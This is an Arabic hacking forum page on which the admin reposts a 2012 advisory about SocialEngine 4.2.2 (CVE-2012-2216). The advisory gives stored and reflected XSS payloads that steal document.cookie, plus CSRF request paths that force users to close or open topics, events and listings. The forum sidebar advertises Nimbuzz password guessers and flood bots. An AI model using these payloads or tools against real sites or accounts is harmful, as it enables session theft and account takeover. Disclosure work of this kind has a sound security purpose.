منتديات القناص ابوهاجوس لهكرالنيمبوز وبرامج الاختراق
مرحبا بكم في منتدىات القناص ابوهاجوس لهكر النيمبوز وبرامج الاختراق
aboohagos@nimbuzz.com
منتديات القناص ابوهاجوس لهكرالنيمبوز وبرامج الاختراق
مرحبا بكم في منتدىات القناص ابوهاجوس لهكر النيمبوز وبرامج الاختراق
aboohagos@nimbuzz.com
منتديات القناص ابوهاجوس لهكرالنيمبوز وبرامج الاختراق
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتديات القناص ابوهاجوس لهكرالنيمبوز وبرامج الاختراق

(aboohagos@nimbuzz.com)على من سجل ولم يستطيع الدخول ان ينتظر لين اقوم بتنشيط حسابه(aboohagos@nimbuzz.com)
 
الرئيسيةأحدث الصورالتسجيلدخول
بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم
سحابة الكلمات الدلالية
تخمين source mini code Facebook
المواضيع الأخيرة
» مشروع بوت يحتوي على فيسات النيم الاصليه Source code bot aboohagos@nimbuzz.com
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Emptyالخميس فبراير 11, 2021 9:49 am من طرف ابوهاجوس

» مشروع بان بوت مع الرسايل التلقايى+التحدث مع مضافينك لغة Visual Basic 2010
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Emptyالخميس فبراير 11, 2021 9:48 am من طرف ابوهاجوس

» Compression(Visual Basic 2008)
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Emptyالخميس فبراير 11, 2021 9:47 am من طرف ابوهاجوس

» مشروع بان بوت ترحيب
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Emptyالخميس فبراير 11, 2021 9:46 am من طرف ابوهاجوس

» مشروع مخمن الباس بلغة Visual Basic 2010
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Emptyالأحد نوفمبر 08, 2020 7:59 am من طرف kimo.herolove1

» مشروع فلود اضافات ب نكات بلغة Visual C# 2010
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Emptyالأحد نوفمبر 08, 2020 7:03 am من طرف kimo.herolove1

» Reflector لفك البرامج المصنوعه بالفجول بيسك دوت نت
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Emptyالأحد نوفمبر 08, 2020 6:54 am من طرف kimo.herolove1

» Source Code DrawingAttributes (abohagooss)( Visual Basic 2008)
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Emptyالأربعاء سبتمبر 02, 2020 2:28 pm من طرف kimo.herolove1

» مشروع التحكم في الديسك توب
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Emptyالأربعاء سبتمبر 02, 2020 2:27 pm من طرف kimo.herolove1

مايو 2024
الأحدالإثنينالثلاثاءالأربعاءالخميسالجمعةالسبت
   1234
567891011
12131415161718
19202122232425
262728293031 
اليوميةاليومية
كل ماتطلبوه موجود
كل جديد وحصريا موجود لدينا
اي استفسار ضيف اميلاتي
aboohagos@nimbuzz.com
aboohagos@nimbuzz.com
أفضل 10 أعضاء في هذا المنتدى
Admin
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  I_vote_rcap ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty 
ابوهاجوس
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  I_vote_rcap ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty 
هكراووي
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  I_vote_rcap ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty 
صدام الشرعبي
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  I_vote_rcap ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty 
kimo.herolove
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  I_vote_rcap ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty 
majed5160
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  I_vote_rcap ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty 
jemlove
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  I_vote_rcap ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty 
brainiac123
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  I_vote_rcap ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty 
zezozezoalhlo
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  I_vote_rcap ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty 
kimo.herolove1
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  I_vote_rcap ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty 
أفضل 10 فاتحي مواضيع
Admin
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  I_vote_rcap ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty 
ابوهاجوس
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  I_vote_rcap ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty 
هكراووي
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  I_vote_rcap ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty 
صدام الشرعبي
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  I_vote_rcap ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty 
المتنبي
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  I_vote_rcap ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty 
عآزف$اوتار$الحزن
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  I_vote_rcap ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty 
ghazi
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  I_vote_rcap ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty 
حسينم
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  I_vote_rcap ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty 
alzeer-libya
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  I_vote_rcap ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty 
وليدالعراقي
 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  I_vote_rcap ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty 
ازرار التصفُّح
 البوابة
 الرئيسية
 قائمة الاعضاء
 البيانات الشخصية
 س .و .ج
 بحـث
المواضيع الأكثر نشاطاً
الاصدار الرابع من برنامج التخمين بتاريخ11-5-2013
مشروع مخمن الباس بلغة Visual Basic 2010
Source Code Flood Room_aboohagos@nimbuzz.com.rar تم التعديل على مشروع فلود روم يقوم بفصل المستخدمين لغة (Visual Basic 2008)
تم تحديث صانع النكات واضافة قسم لتغير كلمة المرور بتاريخ31-5-2013
مشروع صانع نكات الفلود Source Code-ID Maker -
مشروع بان بوت مع الرسايل التلقايى+التحدث مع مضافينك لغة Visual Basic 2010
Source Code Bot contest for Roman-aboohagos@nimbuzz.com مشروع بوت ابوهاجوس المتكامل
مشروع تخمين النكات شغال Source Code Cracker_ abohagooss@nimbuzz.com
استرجاع النكات المسروقة+والمحروقه بتاريخ5-6-2013
اخطر برنامج فلود في تاريخ النيمبوز فلود روم+خاص+اضافات بتاريخ26-4-2013

 

  ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }

اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin
Admin
Admin


عدد المساهمات : 2035
نقاط : 5633
السٌّمعَة : 11
تاريخ التسجيل : 16/05/2012
العمر : 38

 ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Empty
مُساهمةموضوع: ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }     ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }  Emptyالأربعاء يونيو 27, 2012 6:56 pm



بسم الله الرحمن الرحيم




كود PHP:
Social Engine 4.2.2 Multiples Vulnerabilities
Earlier versions are also possibly vulnerable.

INFORMATION

Product: Social Engine 4.2.2
Remote-Exploit: yes
Vendor-URL: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
Discovered by: Tiago Natel de Moura aka "i4k"
Discovered at: 10/04/2012
CVE Notified: 10/04/2012
CVE Number: CVE-2012-2216

OVERVIEW

Social Engine versions 4.2.2 is vulnerable to XSS and CSRF.

INTRODUCTION

SocialEngine is a PHP-based white-label social networking service
platform, that provides features similar to a social network on a user's
website. Main features include administration of small-to-mid scale
social networks, some customization abilities, unencrypted code,
multilingual capability, and modular plugin/widget compatibility. There
is a range of templates and add-ons available to extend the basic
features already included in the SocialEngine core.

VULNERABILITY DESCRIPTION

== Persistent XSS in music upload. ==

CWE-79: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
The software does not neutralize or incorrectly neutralizes
user-controllable input before it is placed in output that is
used as a web page that is served to other users.

Proof Of Concept:
POST [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

POST data without form-data enctype:
title=**********alert(document.cookie);</script>&description=teste
&search=1&auth_view=everyone&MAX_FILE_SIZE=8388608&filename=
&fancyuploadfileids=15

== Persistent XSS in creating events ==

POST
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

POST data without form-data enctype:
title=teste XSS 3&description=teste XSS 3&starttime[date]=4/9/2012&
starttime[hour]=1&starttime[minute]=0&starttime[ampm]=AM&endtime[date]=4/12/2012
&endtime[hour]=1&endtime[minute]=0&endtime[ampm]=AM&host=teste
&location=**********alert(document.cookie);</script>&MAX_FILE_SIZE=8388608&
photo=&category_id=0&search=&search=1&approval=&auth_invite=&auth_invite=1&
auth_view=everyone&auth_comment=everyone&auth_photo=everyone&submit=

== Reflected XSS in search form of events area. ==

Direct javascript injected:
POST [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

format=html&subject=event_1&search=';alert(document.cookie);var a = '

Proof of Concept:
- - Go to URL: /index.php/event/$EVENT_ID
- - Click on the "Guests"
- - Click in "Search guests" form
- - Submit: ';alert(document.cookie); var a = '

You will see your PHPSESSID in the alert.

== Multiples CSRF vulnerabilities ==

CWE-352: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
The web application does not, or can not, sufficiently verify whether
a well-formed, valid, consistent request was intentionally provided by
the user who submitted the request.

A CSRF in the plugin "Forum" allows forcing the owner of the event to do
some
activities such as:

Close a topic:
GET /index.php/forums/topic/4/example-topic/close/close/1

Open a topic:
GET /index.php/forums/topic/4/example-topic/close/close/0

A CSRF in the plugin "Event" allows forcing the owner of the event to do
some
activities such as:

Close the event:
GET /index.php/events/topic/close/close/1/event_id/2/topic_id/2

Open the event:
GET /index.php/events/topic/close/close/0/event_id/2/topic_id/2

"Watch Topic":
GET /index.php/events/topic/watch/watch/1/event_id/2/topic_id/2

"Stop Watching Topic":
GET /index.php/events/topic/watch/watch/0/event_id/2/topic_id/2

A CSRF in the plugin "Classifieds" allows forcing the owner of the event
to do
some activities such as:

Open the classified listing:
GET /index.php/classifieds/close/1/closed/0

Close the classified listing:
GET /index.php/classifieds/close/1/closed/1

VERSIONS AFFECTED

Tested with version 4.2.2 but earlier versions are possibly vulnerable.

SOLUTION

Upgrade to Social Engine 4.2.4.

NOTES


The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2012-2216 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.
CREDITS

Tiago Natel de Moura aka "i4k"
SEC+ Information Security Company - [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
BugSec Security Team - [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

--
Tiago Natel de Moura
IT Security Consultant
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]



رابط الثغرة : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


تحياتي

الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://alqhas.yoo7.com
 
ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
»  ثغرة XSS في منتديات vBulletin 3.8.4
»  [شرح] : ترقيع ثغرة الـ forumhome
»  ثغرة في سكربت الوجيز ( Alwjees )
»  ثغرة عجيبة جداً توصلك الى Phpmyadmin
»  ثغرة لمشاهدة كامرات المراقبة في العالم

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات القناص ابوهاجوس لهكرالنيمبوز وبرامج الاختراق :: منتدى الاختراق العام :: قسم الاختراق العام :: لقسم يعالج الثغرات بجميع أنواعها ويحوي شروحات عن كيفية أكتشاف الثغرات وأستغلالها-
انتقل الى: